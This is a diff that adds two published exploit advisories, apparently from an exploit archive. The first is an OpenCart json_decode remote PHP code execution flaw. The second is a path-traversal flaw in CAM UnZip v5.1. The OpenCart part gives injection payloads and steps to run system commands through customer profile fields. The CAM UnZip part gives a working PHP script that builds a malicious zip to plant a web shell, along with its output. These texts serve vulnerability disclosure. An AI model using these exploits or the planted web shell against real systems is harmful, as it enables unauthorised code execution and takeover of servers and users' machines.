index 000000000..cd8dbd752
--- /dev/null
+++ b/platforms/php/webapps/39679.txt
@@ -0,0 +1,48 @@
+OpenCart json_decode function Remote PHP Code Execution
+
+Author: Naser Farhadi
+Twitter: @naserfarhadi
+
+Date: 9 April 2016 Version: 2.1.0.2 to 2.2.0.0 (Latest version)
+Vendor Homepage: http://www.opencart.com/
+
+Vulnerability:
+------------
+/upload/system/helper/json.php
+$match = '/".*?(?<!\\\\)"/';
+$string = preg_replace($match, '', $json);
+$string = preg_replace('/[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/', '', $string);
+...
+$function = @create_function('', "return {$json};"); /**** The Root of All Evil ****/
+$return = ($function) ? $function() : null;
+...
+return $return;
+
+Exploit(json_decode):
+------------
+var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}'));
+var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}'));
+var_dump(json_decode('{"ok":"1"."2"."3"}'));
+
+Real World Exploit(OpenCart /index.php?route=account/edit)
+------------
+go to http://host/shop_directory/index.php?route=account/edit
+fill $_SERVER[HTTP_USER_AGENT] as First Name
+/** save it two times **/
+Code execution happens when an admin user visits the administration panel, in this example 
+admin user sees his user agent as your First Name in Recent Activity :D
+
+Another example(OpenCart account/edit or account/register custom_field): /** Best Case **/
+------------
+if admin adds a Custom Field from /admin/index.php?route=customer/custom_field for custom
+user information like extra phone number,... you can directly execute your injected code.
+go to http://host/shop_directory/index.php?route=account/edit
+fill {$_GET[b]($_GET[c])} as Custom Field value
+save it
+go to http://host/shop_directory/index.php?route=account/edit&b=system&c=ls /** Mission Accomplished **/
+
+Note:
+------------
+Exploit only works if PHP JSON extension is not installed.
+
+Video: https://youtu.be/1Ai09IQK4C0
diff --git a/platforms/windows/local/39680.txt b/platforms/windows/local/39680.txt
new file mode 100755
index 000000000..02f485c02
--- /dev/null
+++ b/platforms/windows/local/39680.txt
@@ -0,0 +1,103 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/CAMUNZIP-ARCHIVE-PATH-TRAVERSAL.txt
+
+
+Vendor:
+=================
+www.camunzip.com
+
+
+Product:
+==============
+CAM UnZip v5.1
+
+
+Vulnerability Type:
+======================
+Archive Path Traversal
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+
+CAM UnZip fails to check that the paths of the files in the archive do not
+engage in path traversal when uncompressing the archive files.
+specially crafted files in the archive containing '..\' in file name can
+overwrite files on the filesystem by backtracking or allow attackers
+to place malicious files on system outside of the target unzip directory
+which may lead to remote command execution exploits etc...
+
+Tested successfully Windows 7
+
+
+Exploit code(s):
+===============
+
+malicious archive script...
+
+
+<?php
+#CAM UnZip v5.1
+#directory traversal to remote code execution exploit
+#====================================================
+
+if($argc<2){echo "Usage: <filename>";exit();}
+$file_name=$argv[1];
+
+$zip = new ZipArchive();
+$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
+$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '<?php
+exec($_GET["cmd"]); ?>');
+$zip->close();
+
+echo "Malicious archive created...\r\n";
+echo "========= hyp3rlinx ============";
+?>
+
+/////////////////////////////////////////////////////////////////////////////////////
+
+Result:
+
+Creating Folder: C:\Test\BOZO
+
+Extracting Files From: C:\Test\BOZO.zip
+
+Unzipped file C:\Test\BOZO\..\..\..\..\..\..\..\..\RCE.php of size 28
+
+1 file was Extracted.
+
+C:\RCE.php
+
+
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+================
+Medium
+
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+hyp3rlinx